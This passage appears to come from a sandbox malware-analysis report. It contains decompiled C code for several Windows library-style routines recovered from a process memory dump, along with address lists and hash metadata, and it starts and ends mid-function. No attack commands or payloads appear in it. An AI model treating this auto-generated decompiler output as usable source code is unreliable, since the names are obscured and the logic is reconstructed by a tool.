									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E010A95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E010A95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L010877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E010A9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E010A95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1157b9c; // 0x0
									_t92 = L01084620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E010A9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0106A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E010FE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E010FE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E010A95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                            0x010fb8d9
                                                                                                            0x010fb8e4
                                                                                                            0x00000000
                                                                                                            0x010fb8e6
                                                                                                            0x010fb8f3
                                                                                                            0x010fb8f5
                                                                                                            0x010fb8f5
                                                                                                            0x010fb8f8
                                                                                                            0x010fb920
                                                                                                            0x010fb924
                                                                                                            0x010fb936
                                                                                                            0x010fb939
                                                                                                            0x010fb93d
                                                                                                            0x010fb948
                                                                                                            0x010fb9a0
                                                                                                            0x010fb9a0
                                                                                                            0x010fb9a4
                                                                                                            0x010fb9bf
                                                                                                            0x010fb9c4
                                                                                                            0x010fb9c6
                                                                                                            0x010fb9cd
                                                                                                            0x010fb9d1
                                                                                                            0x010fbad4
                                                                                                            0x010fbad8
                                                                                                            0x010fbada
                                                                                                            0x010fbadc
                                                                                                            0x010fbadc
                                                                                                            0x010fbadf
                                                                                                            0x010fbae0
                                                                                                            0x010fbae2
                                                                                                            0x010fbae4
                                                                                                            0x010fbaec
                                                                                                            0x010fbaee
                                                                                                            0x010fbaf0
                                                                                                            0x010fbaf0
                                                                                                            0x010fbaec
                                                                                                            0x010fbafb
                                                                                                            0x010fbafc
                                                                                                            0x010fbafe
                                                                                                            0x010fbb01
                                                                                                            0x010fbb01
                                                                                                            0x00000000
                                                                                                            0x010fbb06
                                                                                                            0x010fb9d7
                                                                                                            0x010fb9db
                                                                                                            0x010fb9db
                                                                                                            0x010fb9de
                                                                                                            0x010fb9de
                                                                                                            0x010fb9e4
                                                                                                            0x010fb9e7
                                                                                                            0x010fb9ea
                                                                                                            0x010fb9ec
                                                                                                            0x010fb9ef
                                                                                                            0x010fb9f3
                                                                                                            0x010fba1b
                                                                                                            0x010fba1b
                                                                                                            0x010fba23
                                                                                                            0x010fba24
                                                                                                            0x010fba27
                                                                                                            0x010fba2a
                                                                                                            0x010fba2b
                                                                                                            0x010fba2e
                                                                                                            0x010fba30
                                                                                                            0x010fba37
                                                                                                            0x010fba3f
                                                                                                            0x010fba9c
                                                                                                            0x010fbaa2
                                                                                                            0x010fbb13
                                                                                                            0x010fbb15
                                                                                                            0x010fbaae
                                                                                                            0x010fbaae
                                                                                                            0x010fbab3
                                                                                                            0x010fbab5
                                                                                                            0x010fbaba
                                                                                                            0x010fbac8
                                                                                                            0x010fbac8
                                                                                                            0x010fbaba
                                                                                                            0x010fbacd
                                                                                                            0x010fbacf
                                                                                                            0x00000000
                                                                                                            0x010fbacf
                                                                                                            0x010fbb1a
                                                                                                            0x00000000
                                                                                                            0x010fbb1c
                                                                                                            0x010fbaa7
                                                                                                            0x010fbb11
                                                                                                            0x00000000
                                                                                                            0x010fbb11
                                                                                                            0x010fbaa9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fba41
                                                                                                            0x010fba41
                                                                                                            0x010fba41
                                                                                                            0x010fba58
                                                                                                            0x010fba5d
                                                                                                            0x010fba62
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fba64
                                                                                                            0x010fba67
                                                                                                            0x010fba68
                                                                                                            0x010fba69
                                                                                                            0x010fba6c
                                                                                                            0x010fba6f
                                                                                                            0x010fba71
                                                                                                            0x010fba78
                                                                                                            0x010fba80
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fba90
                                                                                                            0x010fba90
                                                                                                            0x010fba97
                                                                                                            0x00000000
                                                                                                            0x010fba97
                                                                                                            0x010fb9f5
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9fa
                                                                                                            0x010fba03
                                                                                                            0x010fba07
                                                                                                            0x010fba0c
                                                                                                            0x010fba10
                                                                                                            0x010fba17
                                                                                                            0x00000000
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9a6
                                                                                                            0x010fb9a8
                                                                                                            0x010fb9af
                                                                                                            0x010fb9b3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fb9b9
                                                                                                            0x00000000
                                                                                                            0x010fb9b9
                                                                                                            0x010fb94d
                                                                                                            0x010fb98f
                                                                                                            0x010fb995
                                                                                                            0x010fb999
                                                                                                            0x010fb960
                                                                                                            0x010fb967
                                                                                                            0x010fb968
                                                                                                            0x010fb96a
                                                                                                            0x00000000
                                                                                                            0x010fb96a
                                                                                                            0x010fb99b
                                                                                                            0x010fb99e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fb99e
                                                                                                            0x010fb951
                                                                                                            0x010fb954
                                                                                                            0x010fb95a
                                                                                                            0x010fb95e
                                                                                                            0x010fb972
                                                                                                            0x010fb979
                                                                                                            0x010fb97d
                                                                                                            0x010fb97f
                                                                                                            0x010fb980
                                                                                                            0x010fb982
                                                                                                            0x010fb984
                                                                                                            0x00000000
                                                                                                            0x010fb984
                                                                                                            0x00000000
                                                                                                            0x010fb926
                                                                                                            0x00000000
                                                                                                            0x010fb926

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f234810aad59d70fb87c60aa71550866c0b5e5d8dc53caece58f6dbe071816f
                                                                                                            • Instruction ID: 8156e973ad52cb3067108572314c177903056427896a10c9dc80c91718c6df5c
                                                                                                            • Opcode Fuzzy Hash: 6f234810aad59d70fb87c60aa71550866c0b5e5d8dc53caece58f6dbe071816f
                                                                                                            • Instruction Fuzzy Hash: 4571EF32200706AFE732DF28C846FA6BBE5EB44720F14456CE7D587AA0DB75E944CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E6DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E010E6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E010E6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01087D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E010A9AE0();
					_t87 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E010E795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E010E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E010E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E010E795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01084620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E010E6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E010E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E010E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E010E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01087D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E010A9AE0();
								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01082400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01082400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01082400( &_v52);
							}
							if(_v28 >= 0) {
								return L01082400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                            0x010e6dd4
                                                                                                            0x010e6dde
                                                                                                            0x010e6de1
                                                                                                            0x010e6de3
                                                                                                            0x010e6de6
                                                                                                            0x010e6de9
                                                                                                            0x010e6dec
                                                                                                            0x010e6def
                                                                                                            0x010e6df2
                                                                                                            0x010e6df5
                                                                                                            0x010e6dfe
                                                                                                            0x010e6e04
                                                                                                            0x010e6e09
                                                                                                            0x010e6e0d
                                                                                                            0x010e6e18
                                                                                                            0x010e6e1b
                                                                                                            0x010e6e22
                                                                                                            0x010e6e2d
                                                                                                            0x010e6e30
                                                                                                            0x010e6e36
                                                                                                            0x010e6e42
                                                                                                            0x010e6e4d
                                                                                                            0x010e6e50
                                                                                                            0x010e6e55
                                                                                                            0x010e6e5c
                                                                                                            0x010e6e6e
                                                                                                            0x010e6e5e
                                                                                                            0x010e6e67
                                                                                                            0x010e6e67
                                                                                                            0x010e6e73
                                                                                                            0x010e6e74
                                                                                                            0x010e6e77
                                                                                                            0x010e6e7c
                                                                                                            0x010e6e7d
                                                                                                            0x010e6e8e
                                                                                                            0x010e6e93
                                                                                                            0x010e6e9c
                                                                                                            0x010e6ea8
                                                                                                            0x010e6eab
                                                                                                            0x010e6eac
                                                                                                            0x010e6eb3
                                                                                                            0x010e6ecd
                                                                                                            0x010e6edc
                                                                                                            0x010e6ee2
                                                                                                            0x010e6ee5
                                                                                                            0x010e6ef2
                                                                                                            0x010e6efb
                                                                                                            0x010e6f01
                                                                                                            0x010e6f06
                                                                                                            0x010e6f0b
                                                                                                            0x010e6f11
                                                                                                            0x010e6f1a
                                                                                                            0x010e6f22
                                                                                                            0x010e6f26
                                                                                                            0x010e6f26
                                                                                                            0x010e6f33
                                                                                                            0x010e6f41
                                                                                                            0x010e6f44
                                                                                                            0x010e6f47
                                                                                                            0x010e6f54
                                                                                                            0x010e6f65
                                                                                                            0x010e6f77
                                                                                                            0x010e6f7c
                                                                                                            0x010e6f82
                                                                                                            0x010e6f91
                                                                                                            0x010e6f99
                                                                                                            0x010e6fa3
                                                                                                            0x010e6fae
                                                                                                            0x010e6fae
                                                                                                            0x010e6fba
                                                                                                            0x010e6fbb
                                                                                                            0x010e6fbc
                                                                                                            0x010e6fc1
                                                                                                            0x010e6fc2
                                                                                                            0x010e6fd3
                                                                                                            0x010e6fd8
                                                                                                            0x010e6fd8
                                                                                                            0x010e6fdf
                                                                                                            0x010e6fe8
                                                                                                            0x010e6fee
                                                                                                            0x010e6fee
                                                                                                            0x010e6ff5
                                                                                                            0x010e6ffb
                                                                                                            0x010e6ffb
                                                                                                            0x010e7004
                                                                                                            0x00000000
                                                                                                            0x010e700a
                                                                                                            0x010e7004
                                                                                                            0x010e6eb3
                                                                                                            0x010e6e9c
                                                                                                            0x010e7015

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                            • Instruction ID: 0e47cff1c421aafe60f9849041827344452a5bf443a35b611bf572f2cdbb82f8
                                                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                            • Instruction Fuzzy Hash: B9718071A0061AEFCB11EFA9C944AEEBBF9FF58700F104469E544E7250DB30AA41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010652A5 Relevance: .2, Instructions: 161COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E010652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0107EEF0(0x11579a0);
					_t104 =  *0x1158210; // 0xc02bf0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0107EB70(_t93, 0x11579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E010A9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0107EEF0(0x11579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0107EB70(0, 0x11579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xc02bfd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0109F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0107EEF0(0x11579a0);
									__eflags =  *0x1158210 - _t104; // 0xc02bf0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1158210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E010E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0107EB70(_t95, 0x11579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010A95D0();
											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010A95D0();
											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0107EB70(_t93, 0x11579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E010A95D0();
										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E010A95D0();
										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0109F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                            0x010652a5
                                                                                                            0x010652ad
                                                                                                            0x010652b0
                                                                                                            0x010652b3
                                                                                                            0x010652b7
                                                                                                            0x010652ba
                                                                                                            0x010652bf
                                                                                                            0x010652c4
                                                                                                            0x010652cc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010652ce
                                                                                                            0x010652d9
                                                                                                            0x010652dd
                                                                                                            0x010652e7
                                                                                                            0x010652f7
                                                                                                            0x010652f9
                                                                                                            0x010652fd
                                                                                                            0x010c0dcf
                                                                                                            0x010c0dd5
                                                                                                            0x010c0dd6
                                                                                                            0x010c0dd7
                                                                                                            0x010c0dd8
                                                                                                            0x010c0dd9
                                                                                                            0x010c0dde
                                                                                                            0x010c0ddf
                                                                                                            0x010c0de0
                                                                                                            0x010c0de1
                                                                                                            0x010c0de2
                                                                                                            0x010c0de5
                                                                                                            0x010c0dea
                                                                                                            0x010c0dec
                                                                                                            0x010c0f60
                                                                                                            0x010c0f64
                                                                                                            0x010c0f70
                                                                                                            0x010c0f76
                                                                                                            0x010c0f79
                                                                                                            0x010c0f79
                                                                                                            0x00000000
                                                                                                            0x010c0f64
                                                                                                            0x010c0df2
                                                                                                            0x010c0df7
                                                                                                            0x010c0e04
                                                                                                            0x010c0e0d
                                                                                                            0x010c0e0d
                                                                                                            0x010c0e10
                                                                                                            0x010c0e1a
                                                                                                            0x010c0e1c
                                                                                                            0x010c0e4c
                                                                                                            0x010c0e52
                                                                                                            0x010c0e61
                                                                                                            0x010c0e67
                                                                                                            0x010c0e6b
                                                                                                            0x010c0e70
                                                                                                            0x010c0e76
                                                                                                            0x010c0ed7
                                                                                                            0x010c0edc
                                                                                                            0x010c0ee0
                                                                                                            0x010c0ee6
                                                                                                            0x010c0eea
                                                                                                            0x010c0eed
                                                                                                            0x010c0ef0
                                                                                                            0x010c0ef3
                                                                                                            0x010c0ef6
                                                                                                            0x010c0ef9
                                                                                                            0x010c0efe
                                                                                                            0x010c0f01
                                                                                                            0x010c0f01
                                                                                                            0x010c0f0b
                                                                                                            0x010c0f12
                                                                                                            0x010c0f16
                                                                                                            0x010c0f18
                                                                                                            0x010c0f1b
                                                                                                            0x010c0f2c
                                                                                                            0x010c0f31
                                                                                                            0x010c0f31
                                                                                                            0x010c0f35
                                                                                                            0x010c0f39
                                                                                                            0x010c0f3a
                                                                                                            0x010c0f3c
                                                                                                            0x010c0f3f
                                                                                                            0x010c0f50
                                                                                                            0x010c0f55
                                                                                                            0x010c0f55
                                                                                                            0x010c0f59
                                                                                                            0x010652eb
                                                                                                            0x010652f1
                                                                                                            0x010652f1
                                                                                                            0x010c0e7d
                                                                                                            0x010c0e84
                                                                                                            0x010c0e88
                                                                                                            0x010c0e8a
                                                                                                            0x010c0e8d
                                                                                                            0x010c0e9e
                                                                                                            0x010c0ea3
                                                                                                            0x010c0ea3
                                                                                                            0x010c0ea7
                                                                                                            0x010c0eaf
                                                                                                            0x010c0eb3
                                                                                                            0x010c0eb9
                                                                                                            0x010c0eb9
                                                                                                            0x010c0ebc
                                                                                                            0x010c0ecd
                                                                                                            0x010c0ecd
                                                                                                            0x00000000
                                                                                                            0x010c0eb3
                                                                                                            0x010c0e21
                                                                                                            0x010c0e2b
                                                                                                            0x010c0e2f
                                                                                                            0x010c0e30
                                                                                                            0x010c0e3a
                                                                                                            0x010c0e3f
                                                                                                            0x010c0e41
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c0e47
                                                                                                            0x00000000
                                                                                                            0x010c0e47
                                                                                                            0x010c0df9
                                                                                                            0x010c0dfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c0dfe
                                                                                                            0x01065303
                                                                                                            0x01065307
                                                                                                            0x00000000
                                                                                                            0x01065309
                                                                                                            0x00000000
                                                                                                            0x01065309
                                                                                                            0x01065307
                                                                                                            0x010652e9
                                                                                                            0x010652e9
                                                                                                            0x00000000
                                                                                                            0x010652e9
                                                                                                            0x0106530e
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2bb6ce1745b79afebf82c9447fabd7ee521e59f0bb33fc4b65365c21dd890568
                                                                                                            • Instruction ID: 0e527e01e6659d076ebcb7dd8d5ab9b0543d161955ed2b4fea00eea14a3e5e89
                                                                                                            • Opcode Fuzzy Hash: 2bb6ce1745b79afebf82c9447fabd7ee521e59f0bb33fc4b65365c21dd890568
                                                                                                            • Instruction Fuzzy Hash: 1B51A971205342EBD721EF68C842B6BBBE8BF94B54F14095EF4E587651E770E840CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01092AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01092AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1158204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1158208; // 0x1158207
				_t8 = _t57 + 0x1158208; // 0x1158207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1158450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x115821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1156d5c; // 0x7fb40654
							_t72 =  *0x1156d5c; // 0x7fb40654
							_t75 =  *0x1156d5c; // 0x7fb40654
